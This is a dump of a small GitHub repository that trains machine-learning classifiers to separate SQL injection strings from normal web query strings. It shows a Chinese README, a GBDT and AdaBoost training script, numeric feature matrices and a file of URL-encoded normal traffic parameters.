├── ML_for_SQL
├── .idea
│ ├── ML_for_SQL.iml
│ ├── inspectionProfiles
│ │ └── profiles_settings.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── README
├── __pycache__
│ └── featurepossess.cpython-36.pyc
├── adaboost.py
├── data
│ ├── all_matrix.csv
│ ├── all_matrix.txt
│ ├── alltest_matrix.csv
│ ├── nor_matrix.csv
│ ├── normal_less.csv
│ ├── normal_test.csv
│ ├── nortest_matrix.csv
│ ├── sql_matrix.csv
│ ├── sql_test.csv
│ ├── sqlnew.csv
│ └── sqltest_matrix.csv
├── featurepossess.py
├── file
│ ├── Adaboost.model
│ ├── GBDT.model
│ ├── bys.model
│ ├── forestrandom.model
│ ├── knn.model
│ ├── lg.model
│ ├── svm.model
│ └── tree.model
├── sqlbys.py
├── sqlforestrandom.py
├── sqlkNN.py
├── sqllogistic.py
├── sqlsvm.py
├── sqltree.py
└── testsql.py
└── README.md
/ML_for_SQL/.idea/ML_for_SQL.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/ML_for_SQL/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 | true
156 | DEFINITION_ORDER
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 | project
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 | 1523458935612
484 |
485 |
486 | 1523458935612
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 |
784 |
785 |
786 |
787 |
788 |
789 |
790 |
791 |
792 |
793 |
794 |
--------------------------------------------------------------------------------
/ML_for_SQL/README:
--------------------------------------------------------------------------------
1 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句:
2 | 使用了SVM,Adaboost,GBDT,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。
3 | data是收集的样本数据
4 | file中存放的是训练好的各个模型
5 | featurepossess.py是对原始样本进行预处理,提取特征。
6 | sqlsvm.py等py文件是训练模型
7 | testsql.py是对训练好的模型进行测试,用准确率来度量模型效果。
8 |
--------------------------------------------------------------------------------
/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flywangfang258/ML-for-SQL-Injection/c7f013d1b67a9af8b48f4e6c0fa7e1ad1c35d82f/ML_for_SQL/__pycache__/featurepossess.cpython-36.pyc
--------------------------------------------------------------------------------
/ML_for_SQL/adaboost.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Created on Mon Nov 20 19:06:57 2017
4 |
5 | @author: wf
6 | """
7 | import numpy as np
8 | import pandas as pd
9 | from sklearn import metrics
10 | from sklearn.tree import DecisionTreeClassifier
11 | from sklearn.ensemble import GradientBoostingClassifier
12 | from sklearn.ensemble import AdaBoostClassifier
13 | from sklearn.model_selection import train_test_split
14 | from featurepossess import generate
15 | from sklearn.externals import joblib
16 |
17 | sql_matrix=generate("./data/sqlnew.csv","./data/sql_matrix.csv",1)
18 | nor_matrix=generate("./data/normal_less.csv","./data/nor_matrix.csv",0)
19 |
20 | df = pd.read_csv(sql_matrix)
21 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False)
22 | df = pd.read_csv( nor_matrix)
23 | df.to_csv("./data/all_matrix.csv",encoding="utf_8_sig",index=False, header=False, mode='a+')
24 |
25 | feature_max = pd.read_csv('./data/all_matrix.csv')
26 | arr=feature_max.values
27 | data = np.delete(arr, -1, axis=1) #删除最后一列
28 | #print(arr)
29 | target=arr[:,7]
30 | #随机划分训练集和测试集
31 | train_data,test_data,train_target,test_target = train_test_split(data,target,test_size=0.3,random_state=3)
32 | #模型
33 | model1=DecisionTreeClassifier(max_depth=5)
34 | model2=GradientBoostingClassifier(n_estimators=100)
35 | model3=AdaBoostClassifier(model1,n_estimators=100)
36 | model1.fit(train_data,train_target)#训练模型
37 | model2.fit(train_data,train_target)#训练模型
38 | model3.fit(train_data,train_target)#训练模型
39 | joblib.dump(model2, './file/GBDT.model')#梯度提升书算法
40 | print("GBDT.model has been saved to 'file/GBDT.model'")
41 |
42 | joblib.dump(model3, './file/Adaboost.model')
43 | print("Adaboost.model has been saved to 'file/Adaboost.model'")
44 | #clf = joblib.load('svm.model')
45 | y_pred1=model2.predict(test_data)#预测
46 | print("y_pred:%s"%y_pred1)
47 | print("test_target:%s"%test_target)
48 | #Verify
49 | print("GBDT:")
50 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred1))#查全率
51 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred1))#查准率
52 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred1))#混淆矩阵
53 |
54 | y_pred2=model3.predict(test_data)#预测
55 | print("y_pred:%s"%y_pred2)
56 | print("test_target:%s"%test_target)
57 | #Verify
58 | print("Adaboost:")
59 | print('Precision:%.3f' %metrics.precision_score(y_true=test_target,y_pred=y_pred2))#查全率
60 | print('Recall:%.3f' %metrics.recall_score(y_true=test_target,y_pred=y_pred2))#查准率
61 | print(metrics.confusion_matrix(y_true=test_target,y_pred=y_pred2))#混淆矩阵
62 |
63 |
64 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/all_matrix.txt:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000,0.089286,0.160714,0.035714,0.000000,1.000000
2 | 31.000000,0.000000,0.000000,0.032258,0.129032,0.000000,0.000000,1.000000
3 | 30.000000,0.000000,0.000000,0.066667,0.133333,0.033333,0.000000,1.000000
4 | 75.000000,0.000000,0.000000,0.026667,0.093333,0.013333,0.000000,1.000000
5 | 61.000000,0.000000,0.000000,0.065574,0.147541,0.000000,0.000000,1.000000
6 | 112.000000,0.000000,0.508929,0.008929,0.071429,0.008929,0.000000,1.000000
7 | 28.000000,0.000000,0.000000,0.000000,0.035714,0.035714,0.000000,1.000000
8 | 64.000000,0.000000,0.015625,0.031250,0.125000,0.015625,0.000000,1.000000
9 | 62.000000,0.000000,0.000000,0.112903,0.032258,0.000000,0.000000,1.000000
10 | 29.000000,0.000000,0.000000,0.000000,0.172414,0.000000,0.034483,1.000000
11 | 43.000000,0.000000,0.000000,0.023256,0.093023,0.023256,0.000000,1.000000
12 | 107.000000,0.000000,0.000000,0.018692,0.130841,0.037383,0.000000,1.000000
13 | 48.000000,0.000000,0.000000,0.083333,0.145833,0.020833,0.000000,1.000000
14 | 109.000000,0.000000,0.165138,0.045872,0.100917,0.027523,0.000000,1.000000
15 | 22.000000,0.000000,0.090909,0.090909,0.000000,0.000000,0.000000,1.000000
16 | 142.000000,0.000000,0.197183,0.119718,0.063380,0.028169,0.000000,1.000000
17 | 26.000000,0.000000,0.153846,0.000000,0.000000,0.000000,0.000000,1.000000
18 | 124.000000,0.000000,0.225806,0.120968,0.048387,0.032258,0.000000,1.000000
19 | 52.000000,0.000000,0.307692,0.038462,0.038462,0.019231,0.000000,1.000000
20 | 52.000000,0.000000,0.000000,0.000000,0.076923,0.000000,0.000000,1.000000
21 | 39.000000,0.000000,0.000000,0.051282,0.153846,0.000000,0.000000,1.000000
22 | 68.000000,0.000000,0.014706,0.029412,0.147059,0.000000,0.000000,1.000000
23 | 49.000000,0.000000,0.000000,0.081633,0.102041,0.000000,0.000000,1.000000
24 | 55.000000,0.000000,0.000000,0.000000,0.072727,0.000000,0.000000,1.000000
25 | 40.000000,0.000000,0.000000,0.075000,0.150000,0.000000,0.000000,1.000000
26 | 109.000000,0.000000,0.027523,0.055046,0.155963,0.018349,0.000000,1.000000
27 | 93.000000,0.000000,0.118280,0.032258,0.075269,0.010753,0.000000,1.000000
28 | 52.000000,0.000000,0.173077,0.019231,0.076923,0.019231,0.000000,1.000000
29 | 55.000000,0.000000,0.163636,0.036364,0.109091,0.018182,0.000000,1.000000
30 | 45.000000,0.000000,0.000000,0.000000,0.088889,0.000000,0.000000,1.000000
31 | 50.000000,0.000000,0.080000,0.000000,0.100000,0.000000,0.000000,1.000000
32 | 115.000000,0.000000,0.034783,0.000000,0.121739,0.000000,0.000000,1.000000
33 | 40.000000,0.000000,0.000000,0.000000,0.200000,0.000000,0.000000,1.000000
34 | 27.000000,0.000000,0.000000,0.148148,0.074074,0.000000,0.000000,1.000000
35 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
36 | 64.000000,0.000000,0.000000,0.015625,0.109375,0.000000,0.000000,1.000000
37 | 54.000000,0.000000,0.000000,0.000000,0.129630,0.018519,0.000000,1.000000
38 | 58.000000,0.000000,0.000000,0.000000,0.068966,0.000000,0.000000,1.000000
39 | 81.000000,0.000000,0.000000,0.012346,0.086420,0.000000,0.000000,1.000000
40 | 51.000000,0.000000,0.078431,0.000000,0.117647,0.019608,0.000000,1.000000
41 | 48.000000,0.000000,0.000000,0.000000,0.083333,0.000000,0.000000,1.000000
42 | 52.000000,0.000000,0.076923,0.000000,0.115385,0.000000,0.000000,1.000000
43 | 43.000000,0.000000,0.000000,0.069767,0.093023,0.000000,0.000000,1.000000
44 | 108.000000,0.000000,0.037037,0.083333,0.129630,0.000000,0.000000,1.000000
45 | 284.000000,0.000000,0.028169,0.042254,0.137324,0.000000,0.000000,1.000000
46 | 9.000000,0.000000,0.000000,0.333333,0.000000,0.111111,0.000000,1.000000
47 | 27.000000,0.000000,0.074074,0.222222,0.000000,0.000000,0.000000,1.000000
48 | 14.000000,0.000000,0.000000,0.142857,0.142857,0.071429,0.000000,1.000000
49 | 6.000000,0.000000,0.333333,0.333333,0.166667,0.166667,0.000000,1.000000
50 | 17.000000,0.000000,0.470588,0.235294,0.176471,0.117647,0.000000,1.000000
51 | 12.000000,0.000000,0.583333,0.083333,0.166667,0.000000,0.000000,1.000000
52 | 83.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
53 | 0.000000,0.000000,0.409639,0.240964,0.132530,0.024096,0.000000,1.000000
54 | 17.000000,0.000000,0.058824,0.823529,0.000000,0.000000,0.058824,0.000000
55 | 81.000000,0.000000,0.061728,0.493827,0.000000,0.000000,0.086420,0.000000
56 | 38.000000,0.000000,0.052632,0.605263,0.000000,0.000000,0.078947,0.000000
57 | 495.000000,0.000000,0.367677,0.202020,0.000000,0.000000,0.018182,0.000000
58 | 18.000000,0.000000,0.055556,0.833333,0.000000,0.000000,0.055556,0.000000
59 | 12.000000,0.000000,0.083333,0.750000,0.000000,0.000000,0.083333,0.000000
60 | 22.000000,0.000000,0.318182,0.590909,0.000000,0.000000,0.090909,0.000000
61 | 318.000000,0.000000,0.075472,0.415094,0.000000,0.000000,0.106918,0.000000
62 | 108.000000,0.000000,0.083333,0.583333,0.000000,0.000000,0.083333,0.000000
63 | 35.000000,0.000000,0.057143,0.657143,0.000000,0.000000,0.085714,0.000000
64 | 48.000000,0.000000,0.083333,0.375000,0.000000,0.000000,0.083333,0.000000
65 | 94.000000,0.000000,0.265957,0.563830,0.000000,0.000000,0.106383,0.000000
66 | 39.000000,0.000000,0.025641,0.230769,0.000000,0.000000,0.025641,0.000000
67 | 33.000000,0.000000,0.151515,0.515152,0.000000,0.000000,0.090909,0.000000
68 | 591.000000,0.000000,0.115059,0.407783,0.000000,0.003384,0.101523,0.000000
69 | 273.000000,0.000000,0.073260,0.479853,0.000000,0.000000,0.128205,0.000000
70 | 964.000000,0.000000,0.060166,0.409751,0.000000,0.000000,0.099585,0.000000
71 | 358.000000,0.000000,0.083799,0.550279,0.002793,0.000000,0.106145,0.000000
72 | 524.000000,0.000000,0.188931,0.356870,0.000000,0.000000,0.177481,0.000000
73 | 119.000000,0.000000,0.294118,0.218487,0.000000,0.000000,0.159664,0.000000
74 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/alltest_matrix.csv:
--------------------------------------------------------------------------------
1 | 56.000000,0.000000,0.000000.1,0.089286,0.160714,0.035714,0.000000.2,1.000000
2 | 31.0,0.0,0.0,0.032257999999999995,0.12903199999999998,0.0,0.0,1.0
3 | 30.0,0.0,0.0,0.06666699999999999,0.13333299999999998,0.033333,0.0,1.0
4 | 75.0,0.0,0.0,0.026667000000000003,0.093333,0.013333000000000001,0.0,1.0
5 | 61.0,0.0,0.0,0.06557400000000001,0.147541,0.0,0.0,1.0
6 | 112.0,0.0,0.508929,0.008929000000000001,0.07142899999999999,0.008929000000000001,0.0,1.0
7 | 28.0,0.0,0.0,0.0,0.035713999999999996,0.035713999999999996,0.0,1.0
8 | 64.0,0.0,0.015625,0.03125,0.125,0.015625,0.0,1.0
9 | 62.0,0.0,0.0,0.112903,0.032257999999999995,0.0,0.0,1.0
10 | 29.0,0.0,0.0,0.0,0.172414,0.0,0.034483,1.0
11 | 43.0,0.0,0.0,0.023256,0.09302300000000001,0.023256,0.0,1.0
12 | 107.0,0.0,0.0,0.018692,0.130841,0.037383,0.0,1.0
13 | 48.0,0.0,0.0,0.083333,0.145833,0.020833,0.0,1.0
14 | 109.0,0.0,0.165138,0.045872,0.10091699999999999,0.027523000000000002,0.0,1.0
15 | 22.0,0.0,0.090909,0.090909,0.0,0.0,0.0,1.0
16 | 142.0,0.0,0.197183,0.119718,0.06337999999999999,0.028169,0.0,1.0
17 | 26.0,0.0,0.153846,0.0,0.0,0.0,0.0,1.0
18 | 124.0,0.0,0.225806,0.120968,0.048387,0.032257999999999995,0.0,1.0
19 | 52.0,0.0,0.307692,0.038462,0.038462,0.019231,0.0,1.0
20 | 52.0,0.0,0.0,0.0,0.076923,0.0,0.0,1.0
21 | 39.0,0.0,0.0,0.05128200000000001,0.153846,0.0,0.0,1.0
22 | 68.0,0.0,0.014706,0.029412,0.147059,0.0,0.0,1.0
23 | 49.0,0.0,0.0,0.081633,0.10204099999999999,0.0,0.0,1.0
24 | 55.0,0.0,0.0,0.0,0.072727,0.0,0.0,1.0
25 | 40.0,0.0,0.0,0.075,0.15,0.0,0.0,1.0
26 | 109.0,0.0,0.027523000000000002,0.055046000000000005,0.15596300000000002,0.018349,0.0,1.0
27 | 93.0,0.0,0.11828,0.032257999999999995,0.075269,0.010753,0.0,1.0
28 | 52.0,0.0,0.173077,0.019231,0.076923,0.019231,0.0,1.0
29 | 55.0,0.0,0.163636,0.036364,0.10909100000000001,0.018182,0.0,1.0
30 | 45.0,0.0,0.0,0.0,0.088889,0.0,0.0,1.0
31 | 50.0,0.0,0.08,0.0,0.1,0.0,0.0,1.0
32 | 115.0,0.0,0.034783,0.0,0.12173900000000001,0.0,0.0,1.0
33 | 40.0,0.0,0.0,0.0,0.2,0.0,0.0,1.0
34 | 27.0,0.0,0.0,0.148148,0.074074,0.0,0.0,1.0
35 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0
36 | 64.0,0.0,0.0,0.015625,0.109375,0.0,0.0,1.0
37 | 54.0,0.0,0.0,0.0,0.12963,0.018519,0.0,1.0
38 | 58.0,0.0,0.0,0.0,0.068966,0.0,0.0,1.0
39 | 81.0,0.0,0.0,0.012346,0.08642000000000001,0.0,0.0,1.0
40 | 51.0,0.0,0.078431,0.0,0.117647,0.019608,0.0,1.0
41 | 48.0,0.0,0.0,0.0,0.083333,0.0,0.0,1.0
42 | 52.0,0.0,0.076923,0.0,0.11538499999999999,0.0,0.0,1.0
43 | 43.0,0.0,0.0,0.069767,0.09302300000000001,0.0,0.0,1.0
44 | 108.0,0.0,0.037037,0.083333,0.12963,0.0,0.0,1.0
45 | 284.0,0.0,0.028169,0.042254,0.137324,0.0,0.0,1.0
46 | 9.0,0.0,0.0,0.333333,0.0,0.11111099999999999,0.0,1.0
47 | 27.0,0.0,0.074074,0.22222199999999998,0.0,0.0,0.0,1.0
48 | 14.0,0.0,0.0,0.14285699999999998,0.14285699999999998,0.07142899999999999,0.0,1.0
49 | 6.0,0.0,0.333333,0.333333,0.166667,0.166667,0.0,1.0
50 | 17.0,0.0,0.470588,0.235294,0.17647100000000002,0.117647,0.0,1.0
51 | 12.0,0.0,0.583333,0.083333,0.166667,0.0,0.0,1.0
52 | 83.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0
53 | 0.0,0.0,0.40963900000000003,0.24096399999999998,0.13253,0.024096,0.0,1.0
54 | 81.0,0.0,0.061728,0.493827,0.0,0.0,0.08642000000000001,0.0
55 | 38.0,0.0,0.052632000000000005,0.605263,0.0,0.0,0.078947,0.0
56 | 495.0,0.0,0.367677,0.20202,0.0,0.0,0.018182,0.0
57 | 18.0,0.0,0.055555999999999994,0.833333,0.0,0.0,0.055555999999999994,0.0
58 | 12.0,0.0,0.083333,0.75,0.0,0.0,0.083333,0.0
59 | 22.0,0.0,0.318182,0.590909,0.0,0.0,0.090909,0.0
60 | 318.0,0.0,0.075472,0.41509399999999996,0.0,0.0,0.10691800000000001,0.0
61 | 108.0,0.0,0.083333,0.583333,0.0,0.0,0.083333,0.0
62 | 35.0,0.0,0.05714299999999999,0.657143,0.0,0.0,0.085714,0.0
63 | 48.0,0.0,0.083333,0.375,0.0,0.0,0.083333,0.0
64 | 94.0,0.0,0.265957,0.56383,0.0,0.0,0.10638299999999999,0.0
65 | 39.0,0.0,0.025641000000000004,0.230769,0.0,0.0,0.025641000000000004,0.0
66 | 33.0,0.0,0.151515,0.515152,0.0,0.0,0.090909,0.0
67 | 591.0,0.0,0.115059,0.407783,0.0,0.0033840000000000003,0.101523,0.0
68 | 273.0,0.0,0.07326,0.479853,0.0,0.0,0.12820499999999999,0.0
69 | 964.0,0.0,0.060166,0.40975100000000003,0.0,0.0,0.099585,0.0
70 | 358.0,0.0,0.083799,0.550279,0.002793,0.0,0.106145,0.0
71 | 524.0,0.0,0.188931,0.35686999999999997,0.0,0.0,0.177481,0.0
72 | 119.0,0.0,0.294118,0.218487,0.0,0.0,0.159664,0.0
73 |
--------------------------------------------------------------------------------
/ML_for_SQL/data/normal_test.csv:
--------------------------------------------------------------------------------
1 | _%3D1498591621808
2 | code%3Dzs_000001%2Czs_399001%2Czs_399006%26cb%3Dfortune_hq_cn%26_%3D1498591852632
3 | _%3D1498591951848%26list%3Dml_sh600030
4 | 6053%26ri%3Dzb6-00f%7E-04gUry-01h-0RC%26tn%3D1%26en%3D4L9RATiSWJ84cSXYcX1d2pqRNDaJDyf4dP2hUCLUFiZhTaWU7eK5dl5slq5E7SVvDi63oAKGfcJUNiy27jClo3XeVPICvXbMtyQIUjoFYYlnKQp0XlF0M2zO7d7ub-vumAdasuEscaZLfT5w2tfIKsHlHIn49b0u1Af1JUmZeCeIVpuTgEmDmxYz9GkgA-CCk-qVMZ-V2AfzTEe7HCLcljdw1NcVt-H26P2-dz8IEEj3n9DdQGwpErgkGR6SSbaJpPQu0IgaWmPZEZu-umlvd0urhn88rdu9-Dmn4hYWD2T-menxBL9BSplyy74mnP_4DZXvZ4Ggf4n-k6WXtWPDQYekUxo6XItLiBIOTt5znJ4l9AfspnGY604PtLC0WKwyjqwq27Z4zR9JZsSXxngF9UJFi9JrCW_yldU07E3r3q9LuHrEoy8%3E%3E
5 | b1498592370545%3D1
6 | v%3D13111002
7 | COLLCC%3D3442798258%26
8 | t%3Dcheck%26rec%3Dstratus%26etyp%3Dconnect%26zone%3Dzibo5_cnc%26url%3D119.188.143.32%26errCnt%3D327%26uid%3Dd0a47beafc75e1549c7fdc23530fd959%26uif%3DCNC%7CBeiJing-114.251.186.13%26tvid%3D7706069409%26defi%3D2%26dlod%3D1%26darea%3D1%26ppapi%3Dfalse%26trkip%3D119.188.143.32%26trkon%3D0%26ver%3D3.1.0.15%26dur%3D36431783
9 | cn_600022%2Ccn_600516%2Ccn_000002%2Ccn_600519%2Ccn_000651%2Ccn_600887%2Ccn_002415%2Ccn_601288%2Ccn_000333%2C
10 | _%3D1498179095094%26list%3Dsh600030
11 | q%3DmarketStat%2Cstdunixtime%26_%3D1498584939540
12 | _%3D1498584888937/%26list%3DFU1804%2CFU0%2CFU1707%2CFU1708%2CFU1709%2CFU1710%2CFU1711%2CFU1712
13 | callback%3D_ntes_quote_callback54388229
14 | _%3D1498552987540%26list%3Dhf_OIL
15 | prod%3D56%26systype%3D0%26cid%3D4%26log%3Dact%26from%3D3%263th%3D0%26adTime%3D0%26adType%3Dswf%26dmpt%3Dpad%26po%3Db%26adUrl%3Dhttp%3A//images.sohu.com/ytv/BJ/BJSC/400300201512181625132.swf%26type%3D1%26du%3D500%26al%3D-4%26out%3D0%26au%3D1%26vid%3D130369828%26qd%3Dabbdd136abdb8172%26rt%3D5fd0898fd5ebcf4096145bd7eb4f0bd5%26uv%3D14985797034557443254%26uuid%3D39f371e0-c882-9cdd-fdd7-ea98faf2f9e3%26vt%3D56flash%26rd%3Dwww.56.com%26isIf%3D0%26suv%3D1706280006344804%26uid%3D14985797034557443254%26scookie%3D2%26bad%3D3%26sign%3DTA3ccJAWUeypt831iciWkCbZaSRfhUcmDUDcQDBQDj_tpUXIMgFg-X4ku%3E%3E
16 | tu%3Du1889066%26op%3D1%26jk%3Da014e4716ffd54c4%26word%3Dhttp%3A//www.39yst.com/tieshi/yinshi/481666_2.shtml%26if%3D0%26aw%3D670%26ah%3D90%26pt%3D20500%26it%3D0%26vt%3D0%26csp%3D1024%2C738%26bcl%3D1007%2C624%26pof%3D1007%2C4516%26top%3D3776%26left%3D14%26rdm%3D1498585089587
17 | flag%3Dplyract%26plyract%3Dtiming%26prgr%3D75%26lostfrm%3D13%26lostfrmsec%3D1%26tl%3D60%26src%3D%26purl%3Dhttp%3A//www.iqiyi.com/v_19rr7sryv0.html%23curid%3D710171500_9128e16fccd25dd00ca053a1da504df3%26rfr%3Dhttp%3A//www.iqiyi.com/a_19rrhalt31.html%26lrfr%3Dhttps%3A//www.2345.com/%3Fkbox73713266%26aid%3D203965201%26tvid%3D710171500%26vid%3D284da491e1954fe385336e0054af677f%26cid%3D10%26lev%3D96%26puid%3D%26pru%3D%26veid%3D0f37150b10b8d342bb591c2611b35b41%26weid%3D32c87fb9fc3345fec7cace29952f950d%26newusr%3D0%26pla%3D11%26visits%3D%26sttntp%3D0%26plyrtp%3D0%26plyrver%3D3.3.12.22%26z%3Dqingdao4_cmnet%26suid%3D3911317fef78e8c179aef11a83c22c15%26diaoduuip%3DCMNET%7CBeiJing-218.205.147.2%26plid%3D%26vvfrom%3D%26vfrm%3D10-2-0-1%26vfm%3D%26restp%3D2%26ispur%3D0%26as%3D0ffa7999c6c7c070df03efccc58a6ec3%26qdv%3D2%26bstp%3D6%26isdm%3D0%26isstar%3D0%26hu%3D%26mod%3Dcn_s%26videotp%3D0%26stime%3D1498585048072%26server_ip%3D120.221.22.137%26tn%3D0.021188411861658096
18 | s%3D1498585170292%26y%3Dqc_100001_100015%26e%3D1c37a278a281ec7359f4b0a8e75afe92%26g%3D0%26rd%3D2052%26ps%3D0%26h%3D0%26rc%3D1%26c%3D10%26b%3D203965201%26d%3D71%26a%3D16b34fd092c694bc28eebd634829bc83%26l%3DMTA2LjM3LjIwNC4y%26p%3Ds%26av%3DAdManager%204.0.9%26rid%3Df15a9d21816f582f28fa242f983226dd%26vv%3D5.3.2.67%26t%3Ds%26u%3D3911317fef78e8c179aef11a83c22c15
